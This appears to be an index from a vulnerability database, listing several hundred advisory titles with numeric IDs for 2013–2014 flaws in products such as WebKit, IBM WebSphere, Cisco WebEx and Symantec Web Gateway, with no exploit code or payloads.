[66734] Sophos Web Appliance Privilege Escalation and Remote Code Execution Vulnerabilities
[66733] Advantech WebAccess CVE-2014-0770 Stack-Based Buffer Overflow Vulnerability
[66732] Advantech WebAccess CVE-2014-0768 Stack-Based Buffer Overflow Vulnerability
[66731] Roundcube Webmail IP Check Security Bypass Vulnerability
[66728] Advantech WebAccess CVE-2014-0767 Stack-Based Buffer Overflow Vulnerability
[66725] Advantech WebAccess CVE-2014-0766 Stack-Based Buffer Overflow Vulnerability
[66722] Advantech WebAccess CVE-2014-0765 Stack Based Buffer Overflow Vulnerability
[66718] Advantech WebAccess CVE-2014-0764 Stack-Based Buffer Overflow Vulnerability
[66712] OSIsoft PI Interface for DNP3 CVE-2013-2828 Local Denial of Service Vulnerability
[66711] OSIsoft PI Interface for DNP3 CVE-2013-2809 Remote Denial of Service Vulnerability
[66644] CA Erwin Web Portal CVE-2014-2210 Multiple Directory Traversal Vulnerabilities
[66586] WebKit CVE-2014-1304 Unspecified Memory Corruption Vulnerability
[66585] WebKit CVE-2014-1302 Unspecified Memory Corruption Vulnerability
[66584] WebKit CVE-2014-1301 Unspecified Memory Corruption Vulnerability
[66583] WebKit CVE-2014-1300 Unspecified Memory Corruption Vulnerability
[66581] WebKit CVE-2014-1299 Unspecified Memory Corruption Vulnerability
[66580] WebKit CVE-2014-1297 Unspecified Security Bypass Vulnerability
[66579] WebKit CVE-2014-1313 Unspecified Memory Corruption Vulnerability
[66578] WebKit CVE-2014-1312 Unspecified Memory Corruption Vulnerability
[66577] WebKit CVE-2014-1311 Unspecified Memory Corruption Vulnerability
[66575] WebKit CVE-2014-1310 Unspecified Memory Corruption Vulnerability
[66574] WebKit CVE-2014-1309 Unspecified Memory Corruption Vulnerability
[66573] WebKit CVE-2014-1308 Unspecified Memory Corruption Vulnerability
[66572] WebKit CVE-2014-1307 Unspecified Memory Corruption Vulnerability
[66565] Cisco Web Security Appliance HTTP Header Injection Vulnerability
[66559] IBM WebSphere Portal CVE-2014-0901 Cross Site Scripting Vulnerability
[66556] IBM WebSphere Portal CVE-2014-0828 Cross Site Scripting Vulnerability
[66433] InterWorx Web Control Panel 'xhr.php' SQL Injection Vulnerability
[66377] Jorjweb 'id' Parameter SQL Injection Vulnerability
[66350] BIGACE Web CMS SQL Injection and Local File Include Vulnerabilities
[66333] IBM WebSphere MQ Internet Pass-Thru CVE-2013-5401 Denial of Service Vulnerability
[66328] Webmin CVE-2012-4893 Multiple Cross Site Request Forgery Vulnerabilities
[66295] Moodle Assignment Web Services Security Bypass Vulnerability
[66285] Cisco WebEx Business Suite CVE-2014-0708 Information Disclosure Vulnerability
[66270] Exsoul Web Browser for Android Arbitrary Remote Code Execution Vulnerability
[66248] Webmin 'view.cgi' Cross Site Scripting Vulnerability
[66243] WebKit Use-After-Free Remote Code Execution Vulnerability
[66242] WebKit CVE-2014-1303 Heap Based Buffer Overflow Vulnerability
[66193] McAfee Web Gateway Directory Traversal Vulnerability
[66168] Drupal Webform Template Module Access Bypass Vulnerability
[66088] WebKit Use-After-Free Multiple Memory Corruption Vulnerabilities
[66076] Open Web Analytics 'owa_event' Parameter PHP Object Injection Vulnerability
[66011] Atmail Webmail Cross Site Scripting and Cross Site Request Forgery Vulnerabilities
[65955] IBM WebSphere Portal 'wcm.path.traversal.security' Security Bypass Vulnerability
[65907] webERP 'SalesInquiry.php' SQL Injection Vulnerability
[65897] IBM WebSphere MQ Telemetry CVE-2013-4054 Security Bypass Vulnerability
[65800] WordPress Feedweb Plugin '_wp_http_referer' Parameter Cross Site Scripting Vulnerability
[65781] WebKit CVE-2014-1270 Unspecified Memory Corruption Vulnerability
[65780] WebKit CVE-2014-1269 Unspecified Memory Corruption Vulnerability
[65779] WebKit CVE-2013-6635 Use After Free Memory Corruption Vulnerability
[65778] WebKit CVE-2014-1268 Unspecified Memory Corruption Vulnerability
[65747] Embedthis Goahead Webserver Multiple Denial of Service Vulnerabilities
[65734] InterWorx Web Control Panel Cross Site Scripting Vulnerability
[65701] Joomla! eXtplorer Standalone Interface Authentication Bypass Vulnerability
[65695] Barracuda Networks Web Firewall Multiple HTML Injection Vulnerabilities
[65690] IBM WebSphere eXtreme Scale And DataPower XC10 Information Disclosure Vulnerability
[65660] Fortinet Fortiweb Multiple Security Vulnerabilities
[65617] IBM WebSphere Dashboard Framework Security Bypass Vulnerability
[65614] Opera Web Browser for Mac OS X Prior to 19.00 Address Bar URI Spoofing Vulnerability
[65573] Open Web Analytics CVE-2014-1457 Cross Site Request Forgery Vulnerability
[65571] Open Web Analytics 'owa_user_id' Parameter Cross Site Scripting Vulnerability
[65537] 2E Web Option Predictable Session Token Authentication Bypass Vulnerability
[65528] Drupal Webform Module Cross Site Scripting Vulnerability
[65525] Drupal Webform Validation Module Cross Site Scripting Vulnerability
[65517] webtrees 'wt_v3_street_view.php' Multiple Cross Site Scripting Vulnerabilities
[65516] Cisco Unified Communications Manager CMIVR Interface SQL Injection Vulnerability
[65514] Cisco Unified Communications Manager IP Manager Assistant Interface SQL Injection Vulnerability
[65499] Cisco Unified Communications Manager Java Database Interface SQL Injection Vulnerability
[65494] Cisco Unified Communications 'log4jinit' Web Application Unauthorized Access Vulnerability
[65489] IBM WebSphere Portal CVE-2013-6722 Arbitrary File Upload Vulnerability
[65477] IBM Connections Portlets for WebSphere Portal Multiple Cross Site Scripting Vulnerabilities
[65442] PHP Webcam Video Conference Local File Include and Cross Site Scripting Vulnerabilities
[65437] IcedTea-Web LiveConnect Implementation Insecure Temporary File Creation Vulnerability
[65405] Symantec Web Gateway Multiple Unspecified Cross Site Scripting Vulnerabilities
[65404] Symantec Web Gateway CVE-2013-5012 Multiple SQL Injection Vulnerabilities
[65396] Maian Weblog 'index.php' Multiple Cross Site Scripting Vulnerabilities
[65391] Opera Web Browser for Android Intent Scheme URL's Handling Information Disclosure Vulnerability
[65365] IBM WebSphere Transformation Extender CVE-2013-2962 Local Denial of Service Vulnerability
[65354] Fortinet Fortiweb CVE-2014-1458 HTML Injection Vulnerability
[65350] Web Video Streamer Multiple Security Vulnerabilities
[65303] Fortinet Fortiweb 'filter' Parameter Cross Site Scripting Vulnerability
[65300] Symantec Encryption Management Platform Web Email Protection Unauthorized Access Vulnerability
[65231] WordPress WebEngage Plugin Multiple Cross Site Scripting Vulnerabilities
[65198] Cisco WebEx Meetings Server CVE-2014-0682 Security Bypass Vulnerability
[65178] Opera Web Browser Prior to 19.00 Multiple Unspecified Security Vulnerabilities
[65144] Cisco Secure Access Control System Portal Interface Access Security Bypass Vulnerability
[65100] IBM WebSphere Application Server CVE-2013-6330 Information Disclosure Vulnerability
[65099] IBM WebSphere Application Server in the Administrative Console Cross Site Scripting Vulnerability
[65096] IBM WebSphere Application Server Denial of Service Vulnerability
[65081] Dell OpenManage Web Application OSPF Functionality Denial of Service Vulnerability
[65075] Dell GoAhead Web Server Login Page Form Denial of Service Vulnerability
[65051] Red Hat JBoss Web Framework Kit Information Disclosure Vulnerability
[65049] Red Hat JBoss Web Framework Kit XML External Entity Information Disclosure Vulnerability
[65040] AfterLogic WebMail 'Body' Field HTML Injection Vulnerability
[64983] Cisco Secure Access Control System RMI Interface Authorization Bypass Vulnerability
[64980] Cisco WebEx Meetings Server Administrative Password Disclosure Vulnerability
[64962] Cisco Secure Access Control System RMI Interface Unauthenticated Access Security Vulnerability
[64958] Cisco Secure Access Control System RMI Interface Remote Privilege Escalation Vulnerability
[64835] Oracle WebCenter Portal CVE-2013-5869 Remote Security Vulnerability
[64827] Oracle iPlanet Web Proxy Server CVE-2013-5808 Remote Security Vulnerability
[64779] Atmail Webmail Server Email Body HTML Injection Vulnerability
[64777] Atmail Webmail Server CVE-2013-6028 Cross Site Request Forgery Vulnerability
[64776] Cisco RVS4000/WRVS4400N/WAP4410N Devices Test Interface Remote Privilege Escalation Vulnerability
[64774] Open Web Analytics 'owa_email_address' Parameter SQL Injection Vulnerability
[64750] InduSoft Web Studio Security Vulnerability
[64681] WEBCrafted 'username' Field HTML Injection Vulnerability
[64667] WordPress Zingiri Web Shop Plugin Unspecified Security Vulnerability
[64659] Joomla! Komento 'website' Parameter Cross-Site Scripting Vulnerability
[64653] WordPress Custom Website Data Plugin Cross-Site Request Forgery Vulnerability
[64646] ZyXEL GS1510-16 'webctrl.cgi' Remote Password Disclosure Vulnerability
[64631] Radware AppDirector Web Portal Security Weakness
[64582] Roundcube Webmail Multiple Information Disclosure Vulnerabilities
[64521] WebYaST 'config/initializers/secret_token.rb' Local Privilege Escalation Vulnerability
[64512] Web2ldap Unspecified Cross Site Scripting Vulnerability
[64498] IBM WebSphere Portal Content Template Catalog Remote Code Execution Vulnerability
[64496] IBM Web Content Manager 'LIBRARY' Parameter XPath Injection Vulnerability
[64495] IBM WebSphere Portal WCM Cross Site Scripting Vulnerability
[64492] IBM WebSphere Portal Web Content Manager Information Disclosure Vulnerability
[64488] IBM WebSphere Portal CVE-2013-6723 Information Disclosure Vulnerability
[64455] Cisco NX-OS Command Line Interface (CLI) Local Arbitrary File Access Vulnerability
[64450] Cisco NX-OS Command Line Interface (CLI) Local Arbitrary File Access Vulnerability
[64371] EtoShop Dynamic Biz Website Builder (QuickWeb) Multiple SQL Injection Vulnerabilities
[64363] Icinga Web GUI CVE-2013-7108 Multiple Off-By-One Memory Corruption Vulnerabilities
[64362] WebKit CVE-2013-5228 Use After Free Memory Corruption Vulnerability
[64361] WebKit CVE-2013-5199 Unspecified Memory Corruption Vulnerability
[64360] WebKit CVE-2013-5225 Unspecified Memory Corruption Vulnerability
[64359] WebKit CVE-2013-5198 Unspecified Memory Corruption Vulnerability
[64358] WebKit CVE-2013-5197 Unspecified Memory Corruption Vulnerability
[64356] WebKit CVE-2013-5196 Unspecified Memory Corruption Vulnerability
[64354] WebKit CVE-2013-2909 Use After Free Remote Code Execution Vulnerability
[64353] WebKit CVE-2013-5195 Unspecified Memory Corruption Vulnerability
[64340] IBM Rational ClearQuest Web Client CVE-2013-5422 Unspecified Information Disclosure Vulnerability
[64339] IBM Rational Focal Point Webservice Axis Gateway CVE-2013-5398 Information Disclosure Vulnerability
[64338] IBM Rational Focal Point Webservice Axis Gateway CVE-2013-5397 Information Disclosure Vulnerability
[64306] Cisco WebEx Meeting Center Verbose Server Error Response Remote Information Disclosure Vulnerability
[64305] Cisco WebEx Training Center Training Registration Page Content Spoofing Vulnerability
[64304] Auction Website Script Lowest Unique Bid Auction 'id' Parameter SQL Injection Vulnerability
[64303] Auction Website Script Ebay Clone 'id' Parameter SQL Injection Vulnerability
[64301] IBM WebSphere Service Registry and Repository CVE-2013-6721 HTML Injection Vulnerability
[64299] Auction Website Script Penny Auction 'id' Parameter SQL Injection Vulnerability
[64292] Cisco WebEx Training Center CVE-2013-6968 Email Enumeration Weakness
[64290] Cisco WebEx Training Center CVE-2013-6710 Cross Site Request Forgery Vulnerability
[64289] Webbynode Ruby Gems CVE-2013-7086 Command Injection Vulnerability
[64288] Cisco WebEx Meeting Center Collaboration Partner Access Console Cross Site Scripting Vulnerability
[64287] Cisco WebEx Training Center CVE-2013-6971 Open Redirection Vulnerability
[64286] Cisco WebEx Training Center Registration ID CVE-2013-6973 Information Disclosure Vulnerability
[64285] Cisco WebEx Training Center CVE-2013-6966 Open Redirection Vulnerability
[64284] Cisco WebEx Sales Center CVE-2013-6967 Open Redirection Vulnerability
[64282] Cisco WebEx Training Center Training Session Number Information Disclosure Vulnerability
[64281] Cisco WebEx Training Center CVE-2013-6965 Multiple Information Disclosure Vulnerabilities
[64280] Cisco WebEx Meeting Center CVE-2013-6964 Security Bypass Vulnerability
[64277] Cisco WebEx Training Center CVE-2013-6963 Cross Site Scripting Vulnerability
[64276] Cisco WebEx Training Center CVE-2013-6709 Multiple Information Disclosure Vulnerabilities
[64275] Cisco WebEx Meeting Center CVE-2013-6962 Cross Site Scripting Vulnerability
[64273] Cisco WebEx Meeting Center CVE-2013-6960 Multiple Cross Site Scripting Vulnerabilities
[64272] Cisco WebEx Sales Center CVE-2013-6711 Cross Site Scripting Vulnerability
[64271] Cisco WebEx Sales Center CVE-2013-6959 Open Redirection Vulnerability
[64110] Enorth Webpublisher CMS CVE-2013-6985 'thisday' Parameter SQL Injection Vulnerability
[64030] Satechi Smart Travel Router Web Management Console Remote Authentication Bypass Vulnerability
[63957] GE PACSystems RX3i Ethernet Interface Remote Buffer Overflow Vulnerability
[63950] Multiple General Electric (GE) Products Ethernet Interface Remote Buffer Overflow Vulnerability
[63945] Multiple General Electric (GE) Products Ethernet Interface Remote Buffer Overflow Vulnerability
[63921] Ganglia Web 'get_context.php' Cross Site Scripting Vulnerability
[63805] SKIDATA Freemotion.Gate Unauthenticated Web Services Multiple Command Execution Vulnerabilities
[63801] Opera Web Browser Prior to 18.00 Multiple Unspecified Security Vulnerabilities
[63786] IBM WebSphere Application Server Liberty Profile Insecure File Permissions Vulnerability
[63781] IBM WebSphere Application Server CVE-2013-5414 Security Bypass Vulnerability
[63780] IBM WebSphere Application Server HTTP Response Data Cross Site Scripting Vulnerability
[63778] IBM WebSphere Application Server CVE-2013-5418 Cross Site Scripting Vulnerability
[63724] Apple iOS Safari Mobile Web Browser Session Fixation and Security Bypass Vulnerabilities
[63700] IBM WebSphere Virtual Enterprise CVE-2013-5425 Cross Site Scripting Vulnerability
[63699] Cisco IOS SSL VPN Interface CVE-2013-6686 Remote Denial of Service Vulnerability
[63656] Juniper Networks JUNOS EmbedThis AppWeb Web Server Cross Site Scripting Vulnerability
[63643] IBM WebSphere Portal URL Manipulation Information Disclosure Vulnerability
[63641] IBM WebSphere Portal CVE-2013-5378 Cross Site Scripting Vulnerability
[63640] IBM WebSphere Portal CVE-2013-5379 Cross Site Scripting Vulnerability
[63626] Microweber 'for_id' Parameter SQL Injection Vulnerability
[63611] IBM Sametime WebPlayer Extension CVE-2013-3986 Denial of Service Vulnerability
[63579] Webers CMS Multiple Input Validation Vulnerabilities
[63578] IBM Domino Web Administrator CVE-2013-4055 Cross Site Scripting Vulnerability
[63577] IBM Domino Web Administrator CVE-2013-4050 Cross Site Request Forgery Vulnerability
[63576] IBM Domino Web Administrator CVE-2013-4051 Cross Site Scripting Vulnerability
[63571] Drupal Payment for Webform Module Access Bypass Vulnerability
[63546] Microsoft Windows Graphics Device Interface CVE-2013-3940 Remote Integer Overflow Vulnerability
[63533] Horde Groupware Webmail Edition Unique Token Cross Site Request Forgery Vulnerability
[63532] Horde GroupWare Web Mail Edition Cross Site Scripting and Cross Site Request Forgery Vulnerabilities
[63484] LiteSpeed Web Server Local Privilege Escalation Vulnerability
[63483] Webuzo Cookie Value Handling Remote Command Injection Vulnerability
[63481] LiteSpeed Web Server Race Condition Insecure Temporary File Creation Vulnerability
[63480] Webuzo Invalid Login Handling User Enumeration Weakness
[63464] Webuzo 'user' Parameter Cross Site Scripting Vulnerability
[63377] Horde Groupware Webmail Edition CVE-2013-6275 Multiple Cross Site Request Forgery Vulnerabilities
[63369] ikiwiki-hosting Site Creation Interface Cross Site Scripting Vulnerability
[63358] Tyler Technologies TaxWeb Multiple Information Disclosure Vulnerabilities
[63357] Tyler Technologies TaxWeb 'login.jsp' Cross Site Request Forgery Vulnerability
[63356] Tyler Technologies TaxWeb 'accountNum' Parameter Cross Site Scripting Vulnerability
[63303] RSA Authentication Agent For Web For IIS CVE-2013-3280 Security Bypass Vulnerability
[63302] SAP NetWeaver Web Dynpro Live Update XML External Entity Information Disclosure Vulnerability
[63300] RoundCube Webmail '_session' Parameter Remote Security Vulnerability
[63289] WebKit CVE-2013-5130 Unspecified Security Vulnerability
[63268] WebTester 'install2.php' Multiple Remote Command Execution Vulnerabilities
[63250] IBM WebSphere DataPower XC10 Appliance CVE-2013-5446 Unspecified Security Vulnerability
[63248] IBM WebSphere DataPower XC10 Appliance CVE-2013-5428 Unauthorized Access Vulnerability
[63247] WebCollab 'item' Parameter HTTP Response Splitting Vulnerability
[63218] VMware vSphere Web Client Server Session ID CVE-2013-5971 Handling Session Fixation Vulnerability
[63166] SpamTitan web GUI Multiple Input Validation Vulnerabilities
[63160] WebTester Multiple Security Vulnerabilities
[63074] Oracle Web Cache CVE-2013-3836 Remote Security Vulnerability
[63058] Oracle Web Services CVE-2013-3828 Remote Security Vulnerability
[63049] Oracle WebCenter Content CVE-2013-5813 Remote Security Vulnerability
[63012] Cisco WebEx Meetings Server Deployment Passphrase Validation Security Bypass Vulnerability
[63011] OpenWebif Unauthorized Access Vulnerability
[63006] Dreambox Webcontrol Unauthorized Access Vulnerability
[62998] IBM WebSphere eXtreme Scale Monitoring Console Unspecified Information Disclosure Vulnerability
[62994] IBM WebSphere eXtreme Scale Monitoring Console CVE-2013-5390 Cross Site Scripting Vulnerability
[62992] IBM WebSphere eXtreme Scale Monitoring Console CVE-2013-5394 Unspecified Security Vulnerability
[62948] Imperva SecureSphere Web Application Firewall Search Field SQL Injection Vulnerability
[62940] Juniper Junos J-Web CVE-2013-4689 Cross Site Request Forgery Vulnerability
[62885] Opera Web Browser Prior to 17.00 Multiple Unspecified Security Vulnerabilities
[62792] WebAssist PowerCMS Multiple Cross Site Scripting Vulnerabilities
[62748] Microweber 'file' Parameter Remote Code Execution Vulnerability
[62683] IBM WebSphere DataPower XC10 Appliance CVE-2013-5403 Unauthorized Access Vulnerability
[62646] Cisco IOS And IOS XE RSVP Interface Queue Wedge CVE-2013-5478 Remote Denial of Service Vulnerability
[62635] ClearSCADA Web Requests Remote Denial Of Service Vulnerability
[62631] elproLOG MONITOR WebAccess Multiple Cross Site Scripting and SQL Injection Vulnerabilities
[62624] WordPress Custom Website Data Plugin 'ref' Parameter Cross Site Scripting Vulnerability
[62615] Intelligent Platform Management Interface CVE-2012-4085 Information Disclosure Vulnerability
[62571] WebKit CVE-2013-1044 Unspecified Memory Corruption Vulnerability
[62570] WebKit CVE-2013-1043 Unspecified Memory Corruption Vulnerability
[62569] WebKit CVE-2013-5128 Unspecified Memory Corruption Vulnerability
[62568] WebKit CVE-2013-5127 Unspecified Memory Corruption Vulnerability
[62567] WebKit CVE-2013-5126 Unspecified Memory Corruption Vulnerability
[62565] WebKit CVE-2013-1038 Unspecified Memory Corruption Vulnerability
[62563] WebKit CVE-2013-1047 Unspecified Memory Corruption Vulnerability
[62560] WebKit CVE-2013-5125 Unspecified Memory Corruption Vulnerability
[62559] WebKit CVE-2013-1046 Unspecified Memory Corruption Vulnerability
[62558] WebKit CVE-2013-1045 Unspecified Memory Corruption Vulnerability
[62557] WebKit CVE-2013-1042 Unspecified Memory Corruption Vulnerability
[62556] WebKit CVE-2013-1041 Unspecified Memory Corruption Vulnerability
[62554] WebKit CVE-2013-1040 Unspecified Memory Corruption Vulnerability
[62553] WebKit CVE-2013-1039 Unspecified Memory Corruption Vulnerability
[62551] WebKit CVE-2013-1037 Unspecified Memory Corruption Vulnerability
[62512] Google Android WebView Remote Security Bypass Vulnerability
[62490] RETIRED: WebKit Multiple Unspecified Memory Corruption Vulnerabilities
[62426] IcedTea-Web CVE-2013-4349 Heap Based Buffer Overflow Vulnerability
[62425] Opera Web Browser CVE-2013-4705 Cross Site Scripting Vulnerability
[62417] Sophos UTM WebAdmin Unspecified Security Vulnerability
[62339] IBM WebSphere Application Server CVE-2013-0596 Cross Site Scripting Vulnerability
[62338] IBM WebSphere Application Server CVE-2013-4053 Remote Privilege Escalation Vulnerability
[62336] IBM WebSphere Application Server CVE-2013-4052 Cross Site Scripting Vulnerability
[62305] Juniper Junos J-Web Privilege Escalation Vulnerability
[62289] opWebAPIPlugin Multiple XML External Entity Injection Vulnerabilities
[62265] Sophos Web Protection Appliance CVE-2013-4984 Local Command Injection Vulnerability
[62263] Sophos Web Appliance CVE-2013-4983 Remote Command Injection Vulnerability
[62190] IBM WebSphere Application Server for z/OS JAX-WS Unspecified Remote Security Vulnerability
[62164] Cisco WebEx WRF Player JPEG DHT Index CVE-2013-1119 Memory Corruption Vulnerability
[62163] Cisco WebEx WRF Player CVE-2013-1118 Stack Buffer Overflow Vulnerability
[62160] Cisco WebEx WRF Player Exception Handler CVE-2013-1117 Memory Corruption Vulnerability
[62159] Cisco WebEx ARF Player CVE-2013-1116 Heap Memory Corruption Vulnerability
[62158] Cisco WebEx ARF Player CVE-2013-1115 Memory Corruption Vulnerability
[62093] IBM WebSphere Commerce CVE-2013-2992 Denial of Service Vulnerability
[62038] RoundCube Webmail CVE-2013-5646 HTML-injection Vulnerability
[62026] Opera Web Browser Prior to 16.00 Multiple Unspecified Security Vulnerabilities
[61992] IBM WebSphere Extended Deployment Compute Grid CVE-2013-4039 Information Disclosure Vulnerability
[61988] IBM WebSphere Commerce CVE-2013-0566 Multiple Cross Site Scripting Vulnerabilities
[61976] RoundCube Webmail Multiple HTML-injection Vulnerabilities
[61941] IBM WebSphere Application Server CVE-2013-2967 Cross Site Scripting Vulnerability
[61940] IBM WebSphere Application Server CVE-2013-2976 Local Information Disclosure Vulnerability
[61937] IBM WebSphere Application Server CVE-2013-3029 Cross-Site Request Forgery Vulnerability
[61935] IBM WebSphere Application Server CVE-2013-4004 Cross Site Scripting Vulnerability
[61906] Twilight CMS DeWeS Web Server Directory Traversal Vulnerability
[61902] IBM WebSphere Portal CVE-2013-3016 Unauthorized Access Vulnerability
[61901] IBM WebSphere Application Server CVE-2013-4005 Cross Site Scripting Vulnerability
[61884] Intelligent Platform Management Interface CVE-2013-4037 Authentication Bypass Vulnerability
[61853] Intelligent Platform Management Interface CVE-2013-4038 Remote Information Disclosure Weakness
[61826] IBM WebSphere DataPower SOA Appliances Kerberos AAA Policy Security Bypass Vulnerability
[61807] Copy to WebDAV Multiple Security Vulnerabilities
[61767] OSIsoft PI Interface for IEEE C37.118 Invalid Memory Denial of Service Vulnerability
[61766] OSIsoft PI Interface for IEEE C37.118 CVE-2013-2800 Memory Corruption Vulnerability
[61752] IBM WebSphere Portal CVE-2013-0587 Multiple Cross Site Scripting Vulnerabilities
[61722] Google Chrome 'WebVTTParser::createDocumentFragmentFromCueText()' Denial of Service Vulnerability
[61705] Drupal RESTful Web Services Module Multiple Access Bypass and Security Bypass Vulnerabilities
[61662] TrustPort WebFilter 'help.php' Arbitrary File Access Vulnerability
[61590] Google Web Toolkit CVE-2013-4204 Multiple Cross Site Scripting Vulnerabilities
[61572] Cisco WebEx Meetings Server CVE-2013-3448 Remote Authentication Bypass Vulnerability
[61501] WebDisk 'p' Parameter Remote Code Execution Vulnerability
[61483] IBM WebSphere Commerce Enterprise CVE-2013-2994 Authentication Bypass Vulnerability
[61481] IBM WebSphere Commerce Enterprise CVE-2013-2993 Authentication Bypass Vulnerability
[61469] GE Proficy CIMPLICITY 'CimWebServer' Remote Stack Buffer Overflow Vulnerabilities
[61417] Cisco Unified MeetingPlace Web Conferencing CVE-2013-3438 Security Bypass Vulnerability
[61386] WebCalendar Multiple Security Bypass Vulnerabilities
[61304] Cisco WebEx One-Click Client Password Encryption Information Disclosure Vulnerability
[61290] Symantec Encryption Management Server Web Email Protection Cross Site Scripting Vulnerability
[61228] Oracle WebCenter Content CVE-2013-3770 Remote Security Vulnerability
[61223] Oracle WebCenter Content CVE-2013-3769 Remote Security Vulnerability
[61220] Oracle WebCenter Content CVE-2013-3772 Remote Security Vulnerability
[61106] Symantec Web Gateway CVE-2013-1616 Remote Command Injection Vulnerability
[61105] Symantec Web Gateway CVE-2013-4673 Remote Command Execution Vulnerability
[61104] Symantec Web Gateway CVE-2013-4672 Remote Command Execution Vulnerability
[61103] Symantec Web Gateway CVE-2013-4670 Cross Site Scripting and HTML Injection Vulnerabilities
[61102] Symantec Web Gateway CVE-2013-4671 Cross Site Request Forgery Vulnerability
[61101] Symantec Web Gateway CVE-2013-1617 SQL Injection Vulnerability
[61076] Intelligent Platform Management Interface CVE-2013-4786 Information Disclosure Vulnerability
[61005] Multiple D-Link Products UPnP SOAP Interface Multiple Command Injection Vulnerabilities
[61001] Intelligent Platform Management Interface Null Length Credential Authentication Bypass Vulnerability
[60879] IBM WebSphere MQ Server Control Commands Multiple Local Privilege Escalation Vulnerabilities
[60876] libvirt 'virConnectListAllInterfaces' Method Denial of Service Vulnerability
[60830] Kent Web CLIP-MAIL CVE-2013-3649 Cross-Site Scripting Vulnerability
[60828] Kent Web POST-MAIL CVE-2013-3648 Cross-Site Scripting Vulnerability
[60804] Cisco Web Security Appliance CVE-2013-3383 Command Injection Vulnerability
[60724] IBM WebSphere Application Server CVE-2013-0597 Cross Site Scripting Vulnerability
[60723] Cisco WebEx Social CVE-2013-3392 Multiple Cross Site Request Forgery Vulnerabilities
[60677] IBM Sterling Connect:Direct Browser User Interface Local Information Disclosure Vulnerability
[60676] IBM Sterling Connect:Direct Browser User Interface Local Information Disclosure Vulnerability
[60596] IBM WebSphere Commerce Enterprise CVE-2013-0523 Information Disclosure Vulnerability
[60520] Galapagos for Android 'WebView' Class Information Disclosure Vulnerability
[60518] Angel for Android 'WebView' Class Information Disclosure Vulnerability
[60509] IBM Data Studio Web Console CVE-2013-2980 Cross Site Request Forgery Vulnerability
[60373] Cisco WebEx Meetings Server CVE-2013-1205 Information Disclosure Vulnerability
[60363] WebKit CVE-2013-1013 Unspecified Cross Site Scripting Vulnerability
[60361] WebKit CVE-2013-1012 Unspecified Cross Site Scripting Vulnerability
[60253] IBM WebSphere Cast Iron CVE-2013-2972 Unspecified Security Vulnerability
[60231] IBM WebSphere Portal CVE-2013-0549 Cross Site Scripting Vulnerability
[60218] Drupal Webform Module Components Label HTML Injection Vulnerability
[60201] IBM WebSphere Portal CVE-2013-2950 HTTP Response Splitting Vulnerability
[60199] ZNC WebAdmin Multiple NULL Pointer Dereference Denial of Service Vulnerabilities
[60158] Siemens Solid Edge WebPartHelper ActiveX Remote Code Execution Vulnerability
[60155] Cisco WebEx for iOS CVE-2012-6399 Certificate Validation Security Bypass Vulnerability
[60090] CAREL pCOWeb Default Credentials Security Bypass Vulnerabilities
[60027] WebSphere DataPower SOA Appliances CVE-2013-0499 Cross Site Scripting Vulnerability
[59998] Wireshark Websocket Dissector Denial of Service Vulnerability
[59996] Wireshark Websocket Dissector 'packet-websocket.c' Denial of Service Vulnerability
[59990] MiniWeb HTTP POST Denial of Service Vulnerability
[59984] web2py 'share.js' Script Cross Site Scripting Vulnerability
[59980] Stanford WebAuth FastCGI 'login.fcgi' Information Disclosure Vulnerability
[59977] WebKit CVE-2013-1008 Unspecified Memory Corruption Vulnerability
[59976] WebKit CVE-2013-1010 Unspecified Memory Corruption Vulnerability
[59974] WebKit CVE-2013-1011 Unspecified Memory Corruption Vulnerability
[59973] WebKit CVE-2013-1006 Unspecified Memory Corruption Vulnerability
[59972] WebKit CVE-2013-1005 Unspecified Memory Corruption Vulnerability
[59971] WebKit CVE-2013-1004 Unspecified Memory Corruption Vulnerability
[59970] WebKit CVE-2013-1007 Unspecified Memory Corruption Vulnerability
[59967] WebKit CVE-2013-1003 Unspecified Memory Corruption Vulnerability
[59965] WebKit CVE-2013-1002 Unspecified Memory Corruption Vulnerability
[59964] WebKit CVE-2013-1001 Unspecified Memory Corruption Vulnerability
[59963] WebKit CVE-2013-1000 Unspecified Memory Corruption Vulnerability
[59960] WebKit CVE-2013-0999 Heap Memory Corruption Vulnerability
[59959] WebKit CVE-2013-0998 Memory Corruption Vulnerability
[59958] WebKit CVE-2013-0997 Memory Corruption Vulnerability
[59957] WebKit CVE-2013-0996 Unspecified Memory Corruption Vulnerability
[59956] WebKit CVE-2013-0995 Unspecified Memory Corruption Vulnerability
[59955] WebKit CVE-2013-0994 Unspecified Memory Corruption Vulnerability
[59954] WebKit CVE-2013-0993 Unspecified Memory Corruption Vulnerability
[59953] WebKit CVE-2013-0992 Unspecified Memory Corruption Vulnerability
[59944] WebKit CVE-2013-0991 Unspecified Memory Corruption Vulnerability
[59939] RETIRED: WebKit Multiple Unspecified Memory Corruption Vulnerabilities
[59871] Cisco WebEx Social CVE-2013-1245 Multiple Security Bypass Vulnerabilities
[59867] Cisco WebEx Social CVE-2013-1244 Cross Site Scripting Vulnerability
[59711] IBM WebSphere DataPower XC10 Appliance CVE-2013-0600 Unspecified Security Vulnerability
[59696] Cisco Prime Central for HCS Assurance OpenView Web Menus Cross Site Scripting Vulnerability
[59667] WeBid Local File Disclosure Vulnerability and SQL Injection Vulnerability
[59650] IBM WebSphere Application Server CVE-2013-0482 Security Vulnerability
[59649] Multiple Cisco WebEx Products CVE-2013-1232 Information Disclosure Vulnerability
[59624] Cisco WebEx CVE-2013-1231 Information Disclosure Vulnerability
[59623] Beat Websites 'gid' Parameter SQL Injection Vulnerability
[59544] WebKit Use-After-Free Remote Code Execution Vulnerability
[59517] WebKit 'addChildNodesToDeletionQueue()' Function Use After Free Remote Code Execution Vulnerability
[59515] WebKit 'FrameLoader::checkCompleted()' Function Use After Free Remote Code Execution Vulnerability
[59412] WebKit 'CompositeEditCommand.cpp' Use-After-Free Remote Code Execution Vulnerability
[59379] ERDAS ER Viewer 'ERM_convert_to_correct_webpath()' Function Stack Buffer Overflow Vulnerability
[59353] WordPress All in One Webmaster Plugin Cross Site Request Forgery Vulnerability
[59317] Opera Web Browser Unspecified Security Vulnerability
[59313] Websense Email Security CVE-2012-4605 Information Disclosure Vulnerability
[59286] IcedTea-Web CVE-2013-1927 Security Bypass Vulnerability
[59281] IcedTea-Web CVE-2013-1926 Security Bypass Vulnerability
[59268] Novell GroupWise WebAccess 'onError' Attribute Cross-Site Scripting Vulnerability
[59252] IBM WebSphere Application Server Liberty Profile CVE-2013-0540 Security Bypass Vulnerability
[59251] IBM WebSphere Application Server CVE-2013-0543 Security Bypass Vulnerability
[59250] IBM WebSphere Application Server CVE-2013-0544 Directory Traversal Vulnerability
[59248] IBM WebSphere Application Server CVE-2013-0542 Cross Site Scripting Vulnerability
